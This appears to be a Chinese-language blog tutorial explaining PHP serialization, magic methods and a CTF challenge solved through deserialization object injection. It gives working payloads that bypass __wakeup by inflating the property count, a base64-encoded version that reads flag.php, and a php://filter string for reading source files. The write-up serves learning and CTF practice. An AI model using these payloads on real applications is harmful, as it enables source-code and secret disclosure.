介绍

serialize() ---> 函数用于序列化对象或数组，并返回一个字符串。如下:

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
echo  $serialized_data;
?>

输出结果
a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}
各个字符的意义 ---> o表示对象,a表示数组,s表示字符,i表示数字
a:3 表示有三个数组
i:0,表示第一个数组，s:2:"t1",表示第一个数组是字符，2表示有两个字符，为"t1"
i:1,表示第二个数组，s:3:"tt2",表示第二个数组是字符，3表示有三个字符，为"tt2"
i:2,表示第三个数组，s:4:"ttt3",表示第三个数组是字符，4表示有三个字符，为"ttt3"

unserialize() ---> 函数用于将通过 serialize()函数序列化后的对象或数组进行反序列化，并返回原始的对象结构,如:

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
#echo  $serialized_data;
$unserialized_data = unserialize($serialized_data);
print_r($unserialized_data);
?>

结果如下:

Array
(
    [0] =>  t1
    [1] =>  tt2
    [2] =>  ttt3
)

php使用serialize这个过程被称为序列化，使用unserialize这个过程被称为反序列化。

利用

php类可能会包含一些特殊的函数叫magic函数，magic函数命名是以符号__开头的，比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用，比如__construct当一个对象创建时被调用，__destruct当一个对象销毁时被调用，__toString当一个对象被当作一个字符串使用。

例如

<?php
class Test  
{  
    public $handle1;  
    private $handle2;
    protected $handle3;
   
    public function __construct($handle1,$handle2,$handle3)  
    {  
        $this->handle1 = $handle1;
        $this->handle2 = $handle2;
        $this->handle3 = $handle3;
        echo '__construct<br />';  
    }  
    public function __destruct()  
    {  
        echo $this->handle1.'<br />';
        echo '__destruct<br />';
    }  
    public function __wakeup()  
    {  
        echo '__wakeup<br />';
    }
}

$obj = new Test("111","222","333");
$see = serialize($obj);
print 'Serialized: ' . $see . '<br />';
# %00Test%00v2 表示 private      %00*%00v3 表示protected

$ss = 'O:4:"Test":3:{s:7:"handle1";s:3:"777";s:17:"%00Test%00handle2";s:3:"888";S:14:"%00*%00handle3";s:3:"999";}';
$obj2 = unserialize($ss);
var_dump($obj2);
?>

结果如下:

图片.png

这里[php 5.6.28]的payload='O:4:"Test":3:{s:7:"handle1";s:3:"777";s:17:"%00Test%00handle2";s:3:"888";s:14:"%00*%00handle3";s:3:"999";}'

其他有平台有些可以跑paylaod='O:4:"Test":3:{s:7:"handle1";s:3:"777";s:13:"%00Test%00handle2";s:3:"888";s:10:"%00*%00handle3";s:3:"999";}'[不过我没有成功]

ctf题目

<?php
  class SoFun{ 
    protected $file='index.php';
    function __destruct(){
        if(!empty($this->file)) 
        {
            //查找file文件中的字符串，如果有'\\'和'/'在字符串中，就显示错误
            if(strchr($this->file,"\\")===false &&  strchr($this->file, '/')===false)
            {
                show_source(dirname (__FILE__).'/'.$this ->file);
            }
            else{
                    die('Wrong filename.');
                }
        }
    }
    function __wakeup()
    { 
        $this-> file='index.php';
    } 
    public function __toString()
    {
        return '';
    }
    }     
    if (!isset($_GET['file']))
    { 
        show_source('index.php'); 
    } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file ); 
    } 
?>  #<!--flag in flag.php-->

1、代码审计

审计代码，可以发现要得到flag ，思路如下：
1、源码最后提示，flag 在flag.php里面；
2、注意到__destruct魔术方法中，有这么一段代码，将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file)，这个是解题关键；
3、若POST“file”参数为序列化对象，且将file设为flag.php；那么可以通过unserialize反序列化，进而调用__destruct魔术方法来显示flag.php源码（要注意的是file参数内容需要经过base64编码）；
4、上面的分析是多么美好，但从代码分析可以知道，还有__wakeup这个拦路虎，通过unserialize反序列化之后，也会调用__wakeup方法，它会把file设为index.php；
5、总结下来就是，想办法把file设为flag.php，调用__destruct方法，且绕过__wakeup。

2、PHP反序列化对象注入漏洞

上网查资料，发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。

简单来说，当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行。举个栗子，比如有个Student类，里面有个参数为name。
实际情况：O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}
Payload：O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}
Payload对象属性个数为2，而实际属性个数为1，那么就会掉入漏洞，从而跳过wakeup()方法。

简单来说，当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行。

3、Exp

php版本

$ php --version
PHP 7.0.0 

这里$file是protected ，需要---> \00*\00file 表示protected。S用--->\00 只代表一个字符。用s--->\00表示3个字符。
payload = ?file=O:5:"SoFun":2:{s:11:"\00*\00file";s:8:"flag.php";}
或者
payload = ?file=O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}
经过base64加密后
payload = ?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==

php伪协议

?file=php://filter/read=convert.base64-encode/resource=index.php